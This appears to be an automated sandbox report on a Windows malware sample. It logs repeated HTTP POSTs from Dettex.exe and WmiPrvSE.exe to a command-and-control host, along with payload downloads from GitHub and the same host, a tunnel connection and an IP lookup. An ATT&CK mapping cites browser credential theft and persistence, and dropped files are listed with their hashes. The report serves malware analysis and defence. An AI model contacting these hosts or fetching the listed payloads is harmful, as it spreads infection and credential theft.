User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 131628
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1972
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1972
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1972
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 2520
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive

208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

Dettex.exe

310 B
347 B
5
4

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
127.0.0.1:22100

Dettex.exe
127.0.0.1:22100

Dettex.exe
147.185.221.25:22100

wide-casting.gl.at.ply.gg

Dettex.exe

9.6kB
335.3kB
181
300
147.185.221.25:22100

wide-casting.gl.at.ply.gg

Dettex.exe

136.3kB
2.3kB
114
37
20.26.156.215:443

https://github.com/tvoidrug2024/-/raw/main/winplayit.exe

tls, http

Dettex.exe

956 B
9.3kB
12
13

HTTP Request

GET https://github.com/tvoidrug2024/-/raw/main/winplayit.exe

HTTP Response

302
37.44.238.250:80

http://951499cm.nyashtech.top/PollGeoDbwordpressTemporary/8acca55a18a7a5a5daded82286ad2bee8fcfc279fd574b02bf162c5e6f38c71e0671e9fee21b07df

http

Dettex.exe

52.7kB
2.4MB
1138
2241

HTTP Request

GET http://951499cm.nyashtech.top/PollGeoDbwordpressTemporary/8acca55a18a7a5a5daded82286ad2bee8fcfc279fd574b02bf162c5e6f38c71e0671e9fee21b07df

HTTP Response

200
185.199.110.133:443

raw.githubusercontent.com

tls

Dettex.exe

793 B
4.2kB
10
11
147.185.221.25:22100

wide-casting.gl.at.ply.gg

Dettex.exe

556 B
290 B
7
6
37.44.238.250:80

http://951499cm.nyashtech.top/sqlcentralUploads.php

http

WmiPrvSE.exe

265.9kB
25.6kB
302
180

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php
37.44.238.250:80

http://951499cm.nyashtech.top/sqlcentralUploads.php

http

WmiPrvSE.exe

8.1kB
1.5kB
15
11

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

HTTP Request

POST http://951499cm.nyashtech.top/sqlcentralUploads.php

HTTP Response

200

8.8.8.8:53

ip-api.com

dns

Dettex.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

wide-casting.gl.at.ply.gg

dns

Dettex.exe

71 B
87 B
1
1

DNS Request

wide-casting.gl.at.ply.gg

DNS Response

147.185.221.25
8.8.8.8:53

github.com

dns

Dettex.exe

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

951499cm.nyashtech.top

dns

WmiPrvSE.exe

68 B
84 B
1
1

DNS Request

951499cm.nyashtech.top

DNS Response

37.44.238.250
8.8.8.8:53

raw.githubusercontent.com

dns

Dettex.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.109.133

185.199.111.133

185.199.108.133

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe

Filesize
220B

MD5
47085bdd4e3087465355c9bb9bbc6005

SHA1
bf0c5b11c20beca45cc9d4298f2a11a16c793a61

SHA256
80577e4666fad86273b01f60b8d63c15e4ce37774575ac1e0df7a7c396979752

SHA512
e74dd8e9756cab1123410a46609dc91540cc29a8fea93017155746f7bb9b7a41bfd3d7595a62788264bedceb475b2a733cce9b70f37cc4478302d5fc228d7684

Download Submit
C:\HypercomponentCommon\cemEzm0xYx1.bat

Filesize
105B

MD5
5ee2935a1949f69f67601f7375b3e8a3

SHA1
6a3229f18db384e57435bd3308298da56aa8c404

SHA256
c24a0d7f53a7aa3437f6b6566d3aaebdb36053b64e72cbd1d3796596fc8e3c06

SHA512
9777fcb9ee8a8aa0c770c835c5f30aff6efc5fb16a1819047e13d580d748703ffcb446db110067fb2546a637213cb8f25416d4b621a95a789b8e113d31d3401a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2e752711014ae7c81a8c89ce9a0a31f0

SHA1
ae7d6eb7d4bc9babc20fc5b9e93cfc7492a59aa6

SHA256
bfb06226fa940580ddfab95a23cdb7e77eaa74ad82836142f504a27422e3302b

SHA512
97b70e07d62809c87469daf1ef27bf9af65e560bd70c2bcbc8bc0168a540ead6c7124b91ffd572b103da3e459b279a187dc33f2a87bb4523511c2ee4cfbf60d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\CJRY2NU40N3R74B.exe

Filesize
2.2MB

MD5
05d87a4a162784fd5256f4118aff32af

SHA1
484ed03930ed6a60866b6f909b37ef0d852dbefd

SHA256
7e3d0dabaded78094abfac40d694eaebf861f3cb865d3835bb053d435e996950

SHA512
3d4ce511e9671d8bfa15e93d681fedd972f4fe4c09ac9cfd9653afe83e936654c88ee515a76e7ac80e8f34868802e68c6531fdea0b718029d2196ad1425981fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab68A4.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCCC1.tmp

Filesize
1KB

MD5
645967272b5d7103fcf4578bb32fa377

SHA1
0d4b4361196c50f573f14b86d81c3e852ad3f7c7

SHA256
8da8fee2e9e9204c11fd2010d51a5dbc2e9e424dc4c276becc2c3a567b129d6c

SHA512
25f9452f86c01319ea826e5f0eb65a0c4730c93b8b76bb11f5c3376443dfccf7b56160a4ab16c4a170c727758ef6027ee03e355a9ea7ad0fa64926a8988a44ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCD1F.tmp

Filesize
1KB

MD5
6dfc55303cf201790f10d0f123ac0291

SHA1
f18e7d71532e2397969add00b07f4760f37351cc

SHA256
640011135e4b8b4a55b04fb0f0c9c8f0b0b1d35597d4d3630698f99aabb7057e

SHA512
0077d3e2a06c4652b6a0c2bec5c41bb86888753b0c69a6d543d9bcd10dd05fcd9a0accf06258331d5ee241836b7f814573b2180ac3de2b08b3aca943eeda7163

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar68C6.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\dnXxvW4kMW.bat

Filesize
237B

MD5
ef5eadb367d7a5801b6886b2cf07ea5d

SHA1
77d710d67b0129767a5be674b82171c9bccacfe7

SHA256
b3e746c078c1fa21031714e76df4e9c6fdf161d3eaee309a1cff64d2780bb507

SHA512
26916ef1444d82b4a43e04ed37790d710b1ed6df44b268b203b820d9c2b84022e518f46d36d21b845b371752593e62dc9f4afd9d3ef63a9eb1e25a103874daf4

Download Submit
C:\Users\Admin\AppData\Roaming\Dettex.exe

Filesize
90KB

MD5
1c2a253948135b876e3fe148f45040f1

SHA1
c546d4e05316819469003b332b4bd2a9c4e5f5fd

SHA256
264cfa973e4a1b05c208728074dc9b072c180502494644d324086ba66f791c7c

SHA512
b8e2887c5a7562a001ed013aee2f747aae3e916c85810aff2e857272f75be6c06fd8774a4c2d3676a6fe60dce57f4f9f223092f69036dde4378b71ed9fae7b7f

Download Submit
